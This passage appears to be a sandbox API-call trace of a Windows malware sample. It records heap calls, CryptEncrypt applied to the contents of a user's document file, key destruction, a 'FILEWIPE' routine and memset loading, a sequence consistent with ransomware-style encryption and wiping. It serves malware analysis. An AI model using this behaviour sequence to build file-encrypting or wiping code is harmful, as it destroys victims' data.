PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0179.234] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0179.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0179.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.234] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.234] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0179.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0179.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0179.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0179.235] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.235] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.235] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.235] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x5d90, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x5da0) returned 1 [0179.235] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.235] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.235] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.235] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.235] CharLowerBuffW (in: lpsz="byte[23969]", cchLength=0xb | out: lpsz="byte[23969]") returned 0xb [0179.235] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.235] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.235] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.235] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.235] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.235] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbfb8e0*, pdwDataLen=0x87e820*=0x5d90, dwBufLen=0x5da0 | out: pbData=0xbfb8e0*, pdwDataLen=0x87e820*=0x5da0) returned 1 [0179.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.236] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0179.236] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.236] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0179.236] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.236] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.236] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.236] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.236] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0179.236] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.236] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.240] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.240] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.240] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.250] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.250] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.250] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0179.250] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.250] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.251] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0179.251] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.251] CryptDestroyKey (hKey=0x90af98) returned 1 [0179.251] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.251] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.251] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0179.251] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0179.251] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0179.251] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0179.251] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0179.251] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0179.251] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.251] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0179.251] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0179.252] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0179.252] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.252] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.252] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.252] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0179.252] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.252] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0179.252] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.252] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.252] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.252] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.252] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0179.252] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.252] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.252] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0179.253] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.253] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0179.253] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.253] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0179.253] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.253] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.253] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0179.253] FreeLibrary (hLibModule=0x74f20000) returned 1 [0179.253] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.253] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.253] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.253] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.254] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.255] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.255] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0179.255] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.256] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.256] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x820ae690, ftCreationTime.dwHighDateTime=0x1d5dced, ftLastAccessTime.dwLowDateTime=0xd1f6a5e0, ftLastAccessTime.dwHighDateTime=0x1d5e6b1, ftLastWriteTime.dwLowDateTime=0xd1f6a5e0, ftLastWriteTime.dwHighDateTime=0x1d5e6b1, nFileSizeHigh=0x0, nFileSizeLow=0x5d90, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="izNb7DZLOKQSO_3S.pps", cAlternateFileName="IZNB7D~1.PPS")) returned 0x90af58 [0179.256] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0179.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0179.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0179.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0179.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.256] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0179.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0179.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0179.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.257] CharLowerBuffW (in: lpsz="byte[23952]", cchLength=0xb | out: lpsz="byte[23952]") returned 0xb [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.257] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.257] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.258] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.258] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0179.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0179.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0179.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.259] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0179.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0179.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2628, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0179.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.259] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0179.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0179.259] HeapFree (in: 